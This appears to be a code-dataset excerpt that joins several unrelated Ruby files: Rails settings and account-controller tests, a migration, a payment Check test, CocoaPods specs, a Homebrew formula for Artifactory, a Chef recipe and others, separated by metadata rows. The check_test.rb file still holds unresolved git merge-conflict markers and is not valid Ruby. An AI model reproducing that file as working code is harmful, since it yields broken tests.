assert_equal "string", Setting.smtp_settings[:str]
assert_equal 27.72, Setting.smtp_settings["num"]
assert_equal 9.to_f, Setting.smtp_settings["float"]
assert_equal 2.9.to_d, Setting.smtp_settings["big_decimal"]
assert_record_value :smtp_settings, new_value
Setting.find_by(var: :smtp_settings).update(value: new_value.to_json)
assert_equal({"sym" => "symbol", "str" => "string", "num" => 27.72, "float" => 9.to_f, "big_decimal" => "2.9"}, Setting.smtp_settings)
assert_equal "symbol", Setting.smtp_settings[:sym]
assert_equal "symbol", Setting.smtp_settings["sym"]
end
test "boolean field" do
assert_equal true, Setting.captcha_enable
assert_no_record :captcha_enable
Setting.captcha_enable = "0"
assert_equal false, Setting.captcha_enable
assert_equal false, Setting.captcha_enable?
Setting.captcha_enable = "1"
assert_equal true, Setting.captcha_enable
assert_equal true, Setting.captcha_enable?
Setting.captcha_enable = "false"
assert_equal false, Setting.captcha_enable
assert_equal false, Setting.captcha_enable?
Setting.captcha_enable = "true"
assert_equal true, Setting.captcha_enable
assert_equal true, Setting.captcha_enable?
Setting.captcha_enable = 0
assert_equal false, Setting.captcha_enable
assert_equal false, Setting.captcha_enable?
Setting.captcha_enable = 1
assert_equal true, Setting.captcha_enable
assert_equal true, Setting.captcha_enable?
Setting.captcha_enable = false
assert_equal false, Setting.captcha_enable
assert_equal false, Setting.captcha_enable?
Setting.captcha_enable = true
assert_equal true, Setting.captcha_enable
assert_equal true, Setting.captcha_enable?
end
test "string value in db compatible" do
# array
direct_update_record(:admin_emails, "[email protected],[email protected]\[email protected]")
assert_equal 3, Setting.admin_emails.length
assert_kind_of Array, Setting.admin_emails
assert_equal %w[[email protected] [email protected] [email protected]], Setting.admin_emails
# integer
direct_update_record(:user_limits, "100")
assert_equal 100, Setting.user_limits
assert_kind_of Integer, Setting.user_limits
# boolean
direct_update_record(:captcha_enable, "0")
assert_equal false, Setting.captcha_enable
direct_update_record(:captcha_enable, "false")
assert_equal false, Setting.captcha_enable
direct_update_record(:captcha_enable, "true")
assert_equal true, Setting.captcha_enable
direct_update_record(:captcha_enable, "1")
assert_equal true, Setting.captcha_enable
end
test "array with separator" do
value = <<~TIP
Hello this is first line, and have comma.
This is second line.
TIP
direct_update_record(:tips, value)
assert_equal 2, Setting.tips.length
assert_equal "Hello this is first line, and have comma.", Setting.tips[0]
assert_equal "This is second line.", Setting.tips[1]
value = "Ruby Rails,GitHub"
direct_update_record(:default_tags, value)
assert_equal %w[Ruby Rails GitHub], Setting.default_tags
end
test "key with complex options" do
assert_equal %w[foo bar], Setting.key_with_more_options
field = Setting.get_field(:key_with_more_options)
assert_equal({scope: nil, key: "key_with_more_options", default: ["foo", "bar"], type: :array, readonly: false, options: {foo: 1, section: :theme}}, field)
end
test "rails_scope" do
assert_kind_of ActiveRecord::Relation, Setting.ordered
assert_equal %(SELECT "settings".* FROM "settings" ORDER BY "settings"."id" DESC), Setting.ordered.to_sql
assert_equal %(SELECT "settings".* FROM "settings" WHERE (var like 'readonly_%')), Setting.by_prefix("readonly_").to_sql
assert_equal "foo", Setting.by_prefix("readonly_").foo
end
end
| 35.374656 | 174 | 0.73569 |
bb70fa82339ad5376d53dda74c580bb167d6c933 | 1,825 | # Copyright © 2020 MUSC Foundation for Research Development~
# All rights reserved.~
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:~
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.~
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following~
# disclaimer in the documentation and/or other materials provided with the distribution.~
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products~
# derived from this software without specific prior written permission.~
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,~
# BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT~
# SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL~
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS~
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR~
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.~
class AddCayuseRelations < ActiveRecord::Migration[5.2]
def change
create_join_table :research_masters, :protocols, table_name: "research_master_cayuse_relations" do |t|
t.index :research_master_id
t.index :protocol_id
t.timestamps
end
end
end
| 60.833333 | 146 | 0.788493 |
e2bb22b51c5c037954227ae9e545d3a49761f71d | 187 | class ActsAsUrlParam::BlogPost < ActsAsUrlParamBase
acts_as_url_param do |candidate|
url_param_available_for_model?(candidate) &&
Story.url_param_available?(candidate)
end
end | 31.166667 | 51 | 0.802139 |
4a3da34405b5be2e4d97ea0dc76d7687d5a3883f | 2,480 | require File.dirname(__FILE__) + '/../test_helper'
class CheckTest < Test::Unit::TestCase
<<<<<<< HEAD:test/unit/check_test.rb
include ActiveMerchant::Billing
=======
>>>>>>> shopify/master:test/unit/check_test.rb
VALID_ABA = '111000025'
INVALID_ABA = '999999999'
MALFORMED_ABA = 'I like fish'
ACCOUNT_NUMBER = '123456789012'
def test_validation
c = Check.new
assert !c.valid?
assert !c.errors.empty?
end
<<<<<<< HEAD:test/unit/check_test.rb
=======
def test_first_name_last_name
check = Check.new(:name => 'Fred Bloggs')
assert_equal 'Fred', check.first_name
assert_equal 'Bloggs', check.last_name
assert_equal 'Fred Bloggs', check.name
end
def test_nil_name
check = Check.new(:name => nil)
assert_nil check.first_name
assert_nil check.last_name
assert_equal "", check.name
end
>>>>>>> shopify/master:test/unit/check_test.rb
def test_valid
c = Check.new(:name => 'Fred Bloggs',
:routing_number => VALID_ABA,
:account_number => ACCOUNT_NUMBER,
:account_holder_type => 'personal',
:account_type => 'checking')
assert c.valid?
end
def test_invalid_routing_number
c = Check.new(:routing_number => INVALID_ABA)
assert !c.valid?
assert_equal c.errors.on(:routing_number), "is invalid"
end
def test_malformed_routing_number
c = Check.new(:routing_number => MALFORMED_ABA)
assert !c.valid?
assert_equal c.errors.on(:routing_number), "is invalid"
end
def test_account_holder_type
c = Check.new
c.account_holder_type = 'business'
c.valid?
assert !c.errors.on(:account_holder_type)
c.account_holder_type = 'personal'
c.valid?
assert !c.errors.on(:account_holder_type)
c.account_holder_type = 'pleasure'
c.valid?
assert_equal c.errors.on(:account_holder_type), 'must be personal or business'
c.account_holder_type = nil
c.valid?
assert !c.errors.on(:account_holder_type)
end
def test_account_type
c = Check.new
c.account_type = 'checking'
c.valid?
assert !c.errors.on(:account_type)
c.account_type = 'savings'
c.valid?
assert !c.errors.on(:account_type)
c.account_type = 'moo'
c.valid?
assert_equal c.errors.on(:account_type), "must be checking or savings"
c.account_type = nil
c.valid?
assert !c.errors.on(:account_type)
end
end
| 25.56701 | 82 | 0.653226 |
61ab547f81e7937163b3acbd1305704309b2a37c | 566 | Pod::Spec.new do |s|
s.name = "DTMHeatmap"
s.version = "1.0"
s.summary = "An MKMapView overlay to visualize location data"
s.homepage = "https://github.com/dataminr/DTMHeatmap"
s.license = 'MIT'
s.author = { "Bryan Oltman" => "[email protected]" }
s.social_media_url = "http://twitter.com/moltman"
s.platform = :ios
s.source = { :git => "https://github.com/dataminr/DTMHeatmap.git", :tag => '1.0' }
s.source_files = '*.{h,m}', 'Heatmaps/*', 'Color Providers/*'
s.requires_arc = true
end
| 40.428571 | 90 | 0.586572 |
f8aeff8eea7d7f43224e444c9d7f84241b97717e | 675 | require 'json'
package = JSON.parse(File.read(File.join(__dir__, 'package.json')))
Pod::Spec.new do |s|
s.name = "ReactNativeShareExtension"
s.version = package['version']
s.summary = package['description']
s.license = package['license']
s.authors = package['author']
s.homepage = package['repository']['url']
s.platform = :ios, "9.0"
s.ios.deployment_target = '9.0'
s.tvos.deployment_target = '10.0'
s.source = { :git => "https://github.com/marcinolek/react-native-share-extension.git", :tag => "master" }
s.source_files = "ios/**/*.{h,m}"
s.dependency 'React'
s.dependency 'React-CoreModules'
end | 29.347826 | 113 | 0.623704 |
f79bde03a1b7b84349f88be80ce8adeb09284b25 | 142 | class ImplementationStage < ApplicationRecord
belongs_to :initiative
validates :title, :body, :start_date, :end_date, presence: true
end
| 23.666667 | 65 | 0.788732 |
214e487eeeb0a63ab7e13d32f79be9e8fd66ece1 | 1,338 | require 'erb'
require_relative 'template_processor'
module Compiler
class MustacheProcessor < TemplateProcessor
@@yield_hash = {
after_header: "{{{ afterHeader }}}",
body_classes: "{{ bodyClasses }}",
body_start: "{{{ bodyStart }}}",
body_end: "{{{ bodyEnd }}}",
content: "{{{ content }}}",
cookie_message: "{{{ cookieMessage }}}",
footer_support_links: "{{{ footerSupportLinks }}}",
footer_top: "{{{ footerTop }}}",
head: "{{{ head }}}",
header_class: "{{{ headerClass }}}",
html_lang: "{{ htmlLang }}",
inside_header: "{{{ insideHeader }}}",
page_title: "{{ pageTitle }}",
proposition_header: "{{{ propositionHeader }}}",
top_of_page: "{{{ topOfPage }}}"
}
def handle_yield(section = :layout)
@@yield_hash[section]
end
def asset_path(file, options={})
query_string = GovukTemplate::VERSION
return "#{file}?#{query_string}" if @is_stylesheet
case File.extname(file)
when '.css'
"{{{ assetPath }}}stylesheets/#{file}?#{query_string}"
when '.js'
"{{{ assetPath }}}javascripts/#{file}?#{query_string}"
else
"{{{ assetPath }}}images/#{file}?#{query_string}"
end
end
def content_for?(*args)
@@yield_hash.include? args[0]
end
end
end
| 28.468085 | 62 | 0.573244 |
0129e5cd9cb5f2059e30a4fc963c79c1acc5d891 | 2,013 | #
# Cookbook Name:: apache2
# Definition:: apache_module
#
# Copyright 2008-2013, Opscode, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
define :apache_module, :enable => true, :conf => false do
include_recipe 'apache2::default'
params[:filename] = params[:filename] || "mod_#{params[:name]}.so"
params[:module_path] = params[:module_path] || "#{node['apache']['libexecdir']}/#{params[:filename]}"
params[:identifier] = params[:identifier] || "#{params[:name]}_module"
apache_conf params[:name] if params[:conf]
if platform_family?('rhel', 'fedora', 'arch', 'suse', 'freebsd')
file "#{node['apache']['dir']}/mods-available/#{params[:name]}.load" do
content "LoadModule #{params[:identifier]} #{params[:module_path]}\n"
mode '0644'
end
end
if params[:enable]
execute "a2enmod #{params[:name]}" do
command "/usr/sbin/a2enmod #{params[:name]}"
notifies :restart, 'service[apache2]'
not_if do
::File.symlink?("#{node['apache']['dir']}/mods-enabled/#{params[:name]}.load") &&
(::File.exists?("#{node['apache']['dir']}/mods-available/#{params[:name]}.conf") ? ::File.symlink?("#{node['apache']['dir']}/mods-enabled/#{params[:name]}.conf") : true)
end
end
else
execute "a2dismod #{params[:name]}" do
command "/usr/sbin/a2dismod #{params[:name]}"
notifies :restart, 'service[apache2]'
only_if { ::File.symlink?("#{node['apache']['dir']}/mods-enabled/#{params[:name]}.load") }
end
end
end
| 37.981132 | 177 | 0.657228 |
1add8e92af02a6e579f5292d72de6053d0f1f90c | 1,497 | # encoding: UTF-8
Gem::Specification.new do |s|
s.platform = Gem::Platform::RUBY
s.name = 'spree_zaez_cielo'
s.version = '3.0.12'
s.summary = 'Adds Cielo as a Payment Method to Spree Commerce'
s.description = s.summary
s.required_ruby_version = '>= 2.0.0'
s.author = 'Zaez Team'
s.email = '[email protected]'
s.homepage = 'https://github.com/zaeznet/spree_zaez_cielo'
s.files = `git ls-files`.split("\n")
s.test_files = `git ls-files -- {test,spec,features}/*`.split("\n")
s.require_path = 'lib'
s.requirements << 'none'
s.add_dependency 'spree_core', '~> 3.2.0'
s.add_dependency 'cielo', '~> 0.1.5'
s.add_development_dependency 'poltergeist', '~> 1.5.0'
s.add_development_dependency 'capybara', '~> 2.4'
s.add_development_dependency 'coffee-rails'
s.add_development_dependency 'database_cleaner'
s.add_development_dependency 'factory_girl', '~> 4.5'
s.add_development_dependency 'factory_girl_rails'
s.add_development_dependency 'ffaker'
s.add_development_dependency 'rspec-rails', '~> 3.1'
s.add_development_dependency 'sass-rails', '~> 5.0.0.beta1'
s.add_development_dependency 'selenium-webdriver'
s.add_development_dependency 'simplecov'
s.add_development_dependency 'sqlite3'
s.add_development_dependency 'guard'
s.add_development_dependency 'guard-bundler'
s.add_development_dependency 'guard-rspec'
s.add_development_dependency 'guard-shell'
s.add_development_dependency 'http_logger'
end
| 37.425 | 70 | 0.718103 |
01d9e1ff45421560a69cb18e0619774ae1930a46 | 13,664 | # frozen_string_literal: true
require 'test_helper'
class Buyers::AccountsControllerTest < ActionDispatch::IntegrationTest
class WebhookCreationTest < ActionDispatch::IntegrationTest
disable_transactional_fixtures!
def setup
@buyer = FactoryBot.create :buyer_account
@provider = @buyer.provider_account
login! @provider
end
test 'POST creates the user and the account also when extra_fields are sent' do
FactoryBot.create(:fields_definition, account: @provider, target: 'User', name: 'created_by')
post admin_buyers_accounts_path, params: {
account: {
org_name: 'Alaska',
user: { email: '[email protected]', extra_fields: { created_by: 'hi' }, password: '123456', username: 'hello' }
}
}
account = Account.last
user = User.last
assert_equal 'Alaska', account.org_name
assert_equal '[email protected]', user.email
assert_equal 'hello', user.username
assert_equal 'hi', user.extra_fields['created_by']
end
test 'billing address extra field and webhooks' do
FactoryBot.create(:fields_definition, account: @provider,
target: 'Account', name: 'billing_address', read_only: true)
@provider.settings.allow_web_hooks!
WebHook.delete_all
FactoryBot.create(:webhook, account: @provider, account_created_on: true, active: true)
assert_difference @provider.buyers.method(:count) do
assert_equal 0, WebHookWorker.jobs.size
post admin_buyers_accounts_path, params: {
account: {
org_name: 'hello', org_legaladdress: 'address',
user: { username: 'hello', email: '[email protected]', password: 'password'}
}
}
assert_equal 1, WebHookWorker.jobs.size
assert_response :redirect
end
account = Account.last!
assert account.approved?
assert_equal 'hello', account.org_name
assert_equal 'address', account.org_legaladdress
end
end
class MemberPermissionsTest < Buyers::AccountsControllerTest
def setup
@provider = FactoryBot.create(:provider_account)
@user = FactoryBot.create(:active_user, account: provider, role: :member, member_permission_ids: [:partners])
login! provider, user: user
end
attr_reader :user, :provider
def test_show
buyer = FactoryBot.create(:buyer_account, provider_account: provider)
service = FactoryBot.create(:service, account: provider)
plan = FactoryBot.create(:application_plan, issuer: service)
plan.publish!
buyer.buy! plan
cinstance = service.cinstances.last
cinstance.update(name: 'Alaska Application App')
User.any_instance.expects(:has_access_to_all_services?).returns(true).at_least_once
get admin_buyers_account_path(buyer)
assert_response :success
assert_match 'Alaska Application App', response.body
User.any_instance.expects(:has_access_to_all_services?).returns(false).at_least_once
get admin_buyers_account_path(buyer)
assert_response :success
assert_not_match 'Alaska Application App', response.body
User.any_instance.expects(:member_permission_service_ids).returns([service.id]).at_least_once
get admin_buyers_account_path(buyer)
assert_response :success
assert_match 'Alaska Application App', response.body
end
test 'member user without billing permission cannot manage invoice' do
buyer = FactoryBot.create(:simple_buyer, provider_account: provider)
provider.settings.allow_finance!
get admin_buyers_account_invoices_path(buyer)
assert_response :forbidden
assert_no_difference -> { Invoice.count } do
post admin_buyers_account_invoices_path(buyer)
assert_response :forbidden
end
invoice = FactoryBot.create(:invoice, buyer_account: buyer, provider_account: provider)
get edit_admin_buyers_account_invoice_path(buyer, invoice)
assert_response :forbidden
end
test 'member user with billing permission can manage invoice' do
user.member_permission_ids = %i[partners finance]
user.save!
buyer = FactoryBot.create(:simple_buyer, provider_account: provider)
provider.settings.allow_finance!
get admin_buyers_account_invoices_path(buyer)
assert_response :success
assert_difference -> { Invoice.count }, 1 do
post admin_buyers_account_invoices_path(buyer)
assert_response :redirect
end
invoice = FactoryBot.create(:invoice, buyer_account: buyer, provider_account: provider)
get edit_admin_buyers_account_invoice_path(buyer, invoice)
assert_response :success
end
test "can't manage buyer accounts" do
user.member_permission_ids = []
user.save!
get admin_buyers_accounts_path
assert_response :forbidden
get new_admin_buyers_account_path
assert_response :forbidden
buyer = FactoryBot.create(:simple_buyer, provider_account: provider, name: 'bob')
get admin_buyers_account_path(buyer)
assert_response :forbidden
get edit_admin_buyers_account_path(buyer)
assert_response :forbidden
put admin_buyers_account_path(buyer), params: {account: {name: 'carl'}}
assert_response :forbidden
assert_equal 'bob', buyer.reload.name
delete admin_buyers_account_path(buyer)
assert_response :forbidden
assert Account.exists?(buyer.id)
assert_no_difference(Account.method(:count)) do
post admin_buyers_accounts_path, params: {
account: {
name: 'secret agent',
user: { username: 'johndoe', email: '[email protected]', password: 'secretpassword' }
}
}
end
assert_response :forbidden
end
end
class ProviderLoggedInTest < Buyers::AccountsControllerTest
def setup
@buyer = FactoryBot.create(:buyer_account, name: 'bob')
@provider = @buyer.provider_account
login! @provider
end
test '#new and #create redirects if it has a non-default application plan' do
@provider.account_plans.delete_all
@provider.account_plans.create!(name: 'non default account plan')
post admin_buyers_accounts_path, params: {
account: {
org_name: 'Alaska',
user: { email: '[email protected]', password: '123456', username: 'hello' }
}
}
assert_redirected_to admin_buyers_account_plans_path
assert_equal 'Please, create an Account Plan first', flash[:alert]
end
test 'POST with an error outside account or user is shown as a flash error' do
errors = ActiveModel::Errors.new(Plan.new)
errors.add(:base, 'error that is not in "user" or "account"')
errors.add(:base, 'another error')
Signup::Result.any_instance.stubs(errors: errors)
post admin_buyers_accounts_path, params: {
account: {
org_name: 'Alaska',
user: { email: '[email protected]', password: '123456', username: 'hello' }
}
}
assert_equal 'error that is not in "user" or "account". another error', flash[:error]
end
# regression test for: https://github.com/3scale/system/issues/2567
test "not raise exception on update if params[:account] is nil" do
put admin_buyers_account_path @buyer
assert_equal "Required parameter missing: account", response.body
end
test 'checks if link under number of applications is correct' do
@provider.settings.allow_multiple_applications!
service = FactoryBot.create(:service, account: @provider)
FactoryBot.create_list(:application, 2, user_account: @buyer, service: @provider.default_service)
FactoryBot.create_list(:application, 3, service: service, user_account: @buyer)
get admin_buyers_accounts_path
assert_select %(td a[href="#{admin_buyers_account_applications_path(@buyer)}"]), text: '5'
end
test 'checks if link under number of applications is correct as member' do
@provider.settings.allow_multiple_applications!
service = FactoryBot.create(:service, account: @provider)
FactoryBot.create_list(:application, 2, user_account: @buyer)
FactoryBot.create_list(:application, 3, service: service, user_account: @buyer)
# Testing member permissions
member = FactoryBot.create(:member, account: @provider)
member.member_permission_service_ids = [service.id]
member.save!
login! @provider, user: member
get admin_buyers_accounts_path
assert_select %(td a[href="#{admin_buyers_account_applications_path(@buyer)}"]), text: '3'
end
test '#create' do
assert_no_difference(-> { @provider.buyers.count }) do
post admin_buyers_accounts_path, params: {
account: {
org_name: 'My organization'
}
}
assert_select '#account_user_username_input.required.error'
assert_response :success
end
assert_difference(-> { @provider.buyers.count }) do
post admin_buyers_accounts_path, params: {
account: {
org_name: 'My organization',
user: {
username: 'johndoe',
email: '[email protected]',
password: 'secretpassword'
}
}
}
assert_response :redirect
end
end
test "can't manage buyer's of other providers" do
another_provider = FactoryBot.create(:provider_account)
login! another_provider
get admin_buyers_accounts_path
assert assigns(:presenter).buyers
assert_equal 0, assigns(:presenter).buyers.size
get admin_buyers_account_path(@buyer)
assert_response :not_found
get edit_admin_buyers_account_path(@buyer)
assert_response :not_found
put admin_buyers_account_path(@buyer), params: {account: {name: 'mike'}}
assert_response :not_found
assert_equal 'bob', @buyer.reload.name
delete admin_buyers_account_path(@buyer)
assert_response :not_found
assert Account.exists?(@buyer.id)
end
test 'index/search & show display the admin_user_display_name' do
get admin_buyers_accounts_path
page = Nokogiri::HTML::Document.parse(response.body)
expected_display_names = @provider.buyer_accounts.map { |buyer| buyer.decorate.admin_user_display_name }
assert_same_elements expected_display_names, page.xpath('//tbody/tr/td[2]/a').map(&:text)
get admin_buyers_accounts_path(id: @buyer.id)
assert_xpath('//tbody/tr/td[2]/a', @buyer.decorate.admin_user_display_name)
end
test 'User with invalid data shows an flash error' do
post admin_buyers_accounts_path, params: {
account: {
org_name: 'My organization',
user: {
username: 'hello'
}
}
}
assert_equal 'Users invalid', flash[:error]
end
end
class MasterLoggedInTest < Buyers::AccountsControllerTest
def setup
@master = master_account
@provider = FactoryBot.create(:provider_account, provider_account: @master)
login! @master
end
test 'show plan for SaaS' do
ThreeScale.config.stubs(onpremises: false)
get admin_buyers_account_path(@provider)
assert_xpath( './/div[@id="applications_widget"]//table[@class="list"]//tr', 4)
assert_xpath( './/div[@id="applications_widget"]//table[@class="list"]//tr', /plan/i )
end
test 'do not show plan for on-prem' do
ThreeScale.config.stubs(onpremises: true)
get admin_buyers_account_path(@provider)
assert_xpath( './/div[@id="applications_widget"]//table[@class="list"]//tr', 2)
refute_xpath( './/div[@id="applications_widget"]//table[@class="list"]//tr', /plan/i )
end
test 'suspend button is displayed only when account is not deleted or marked for deletion' do
ThreeScale.config.stubs(onpremises: false)
get admin_buyers_account_path(@provider)
assert_select %(td a.button-to.action.suspend), true
@provider.suspend
get admin_buyers_account_path(@provider)
assert_select %(td a.button-to.action.suspend), false
delete admin_buyers_account_path(@provider)
assert_select %(td a.button-to.action.suspend), false
end
end
class NotLoggedInTest < ActionDispatch::IntegrationTest
test "anonymous users can't manage buyer accounts" do
provider = FactoryBot.create(:provider_account)
host! provider.admin_domain
get admin_buyers_accounts_path
assert_redirected_to provider_login_path
get new_admin_buyers_account_path
assert_redirected_to provider_login_path
buyer = FactoryBot.create(:simple_buyer, provider_account: provider, name: 'bob')
get admin_buyers_account_path(buyer)
assert_redirected_to provider_login_path
get edit_admin_buyers_account_path(buyer)
assert_redirected_to provider_login_path
put admin_buyers_account_path(buyer), params: {account: {name: 'carl'}}
assert_redirected_to provider_login_path
assert_equal 'bob', buyer.reload.name
delete admin_buyers_account_path(buyer)
assert_redirected_to provider_login_path
assert Account.exists?(buyer.id)
assert_no_difference(Account.method(:count)) do
post admin_buyers_accounts_path, params: {
account: {
name: 'secret agent',
user: { username: 'johndoe', email: '[email protected]', password: 'secretpassword' }
}
}
end
assert_redirected_to provider_login_path
end
end
end
| 34.592405 | 123 | 0.686183 |
e9381c63574a47fa55876fd58cb913e0f2c4cf97 | 2,153 | class Artifactory < Formula
desc "Manages binaries"
homepage "https://www.jfrog.com/artifactory/"
url "https://dl.bintray.com/jfrog/artifactory/jfrog-artifactory-oss-5.3.0.zip"
sha256 "7ede1581dde6d45bd766eec9881e9b2927bf084ca4ae9804352a2fa9d95e08bd"
bottle :unneeded
option "with-low-heap", "Run artifactory with low Java memory options. Useful for development machines. Do not use in production."
depends_on :java => "1.8+"
def install
# Remove Windows binaries
rm_f Dir["bin/*.bat"]
rm_f Dir["bin/*.exe"]
# Set correct working directory
inreplace "bin/artifactory.sh",
'export ARTIFACTORY_HOME="$(cd "$(dirname "${artBinDir}")" && pwd)"',
"export ARTIFACTORY_HOME=#{libexec}"
if build.with? "low-heap"
# Reduce memory consumption for non production use
inreplace "bin/artifactory.default",
"-server -Xms512m -Xmx2g",
"-Xms128m -Xmx768m"
end
libexec.install Dir["*"]
# Launch Script
bin.install_symlink libexec/"bin/artifactory.sh"
# Memory Options
bin.install_symlink libexec/"bin/artifactory.default"
end
def post_install
# Create persistent data directory. Artifactory heavily relies on the data
# directory being directly under ARTIFACTORY_HOME.
# Therefore, we symlink the data dir to var.
data = var/"artifactory"
data.mkpath
libexec.install_symlink data => "data"
end
plist_options :manual => "#{HOMEBREW_PREFIX}/opt/artifactory/libexec/bin/artifactory.sh"
def plist; <<-EOS.undent
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.jfrog.artifactory</string>
<key>WorkingDirectory</key>
<string>#{libexec}</string>
<key>Program</key>
<string>#{bin}/artifactory.sh</string>
<key>KeepAlive</key>
<true/>
</dict>
</plist>
EOS
end
test do
assert_match "Checking arguments to Artifactory", pipe_output("#{bin}/artifactory.sh check")
end
end
| 28.706667 | 132 | 0.667441 |
18c2bd89184f006c60ebb59f9515ba2decc9da3b | 693 | require 'spec_helper'
describe 'profile::app::rgbank' do
SUPPORTED_OS.each do |os, facts|
context "on #{os}" do
let(:facts) do
facts
end
before(:each) do
Puppet::Parser::Functions.newfunction(:puppetdb_query, :type => :rvalue) do |args|
[{'facts'=>{'fqdn'=> 'testserver'}}]
end
end
if Gem.win_platform?
context "unsupported OS" do
it { is_expected.to compile.and_raise_error(/Unsupported OS/) }
end
else
context "without any parameters" do
it { is_expected.to compile.with_all_deps }
end
end
end
end
end
| 22.354839 | 92 | 0.539683 |
0322364da53f5ff49277bc53adc4851f91ba3ca2 | 1,088 | require 'open-uri'
require 'json'
module Rabatt
module Providers
class Webgains < Base
URL = 'http://api.webgains.com/2.0/vouchers'
DEFAULT_PARAMS = {
networks: 'SE'
}
attr_accessor :api_key
def initialize(api_key = nil)
self.api_key = api_key || ENV['WEBGAINS_API_KEY']
raise(ArgumentError, "Missing Webgains ApiKey") unless self.api_key
end
def vouchers(options = {})
uri = URI.parse(URL)
params = DEFAULT_PARAMS.merge(**options, key: api_key)
uri.query = URI.encode_www_form(params)
res = open(uri)
JSON.parse(res.read).map do |data|
Voucher.build do |v|
v.uid = data['id']
v.program = data['program_name']
v.code = data['code']
v.valid_from = Date.parse(data['startDate'])
v.expires_on = Date.parse(data['expiryDate'])
v.summary = data['description']
v.url = data['destinationUrl']
v.provider = :webgains
end
end
end
end
end
end
| 25.302326 | 75 | 0.563419 |
6a37baed69148c952c8eb2ea96e93e44bdc22c8f | 1,069 | # encoding: UTF-8
#
# Cookbook Name:: openstack-ops-database
# Recipe:: postgresql-server
#
# Copyright 2013, Opscode, Inc.
# Copyright 2012-2013, Rackspace US, Inc.
# Copyright 2013, AT&T Services, Inc.
# Copyright 2013, SUSE Linux GmbH
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class ::Chef::Recipe # rubocop:disable Documentation
include ::Openstack
end
db_endpoint = endpoint 'db'
node.override['postgresql']['config']['listen_addresses'] = db_endpoint.host
include_recipe 'openstack-ops-database::postgresql-client'
include_recipe 'postgresql::server'
| 31.441176 | 76 | 0.757717 |
ac03a57d12bf00590133afb0468ae3a4421145e1 | 562 | require 'spec_helper_acceptance'
# Ensure IPv6 router advertisements are not accepted - Section 3.3.1
# Ensure IPv6 redirets are not accepted - Section 3.3.2
describe file ( '/etc/sysctl.d/99-sysctl.conf' ) do
it { should be_symlink }
it { should be_owned_by 'root' }
it { should be_grouped_into 'root' }
its (:content) { should match /net.ipv6.conf.all.accept_ra = 0/ }
its (:content) { should match /net.ipv6.conf.default.accept_ra = 0/ }
its (:content) { should match /net.ipv6.conf.all.accept_redirects = 0/ }
its (:content)
end | 43.230769 | 76 | 0.690391 |
6ad56dd368243c59aecd37492622b79fa49e551d | 551 | # frozen_string_literal: true
module Gitlab
module SlashCommands
module Presenters
class IssueComment < Presenters::Base
include Presenters::NoteBase
def present
ephemeral_response(response_message)
end
private
def fallback_message
"New comment on #{issue.to_reference}: #{issue.title}"
end
def pretext
"I commented on an issue on #{author_profile_link}'s behalf: *#{issue.to_reference}* in #{project_link}"
end
end
end
end
end
| 21.192308 | 114 | 0.627949 |
1d9222575d68d4b231ac0223aa94aafe94e1877b | 143 | require 'test_helper'
class YogaClassesControllerTest < ActionDispatch::IntegrationTest
# test "the truth" do
# assert true
# end
end
| 17.875 | 65 | 0.748252 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.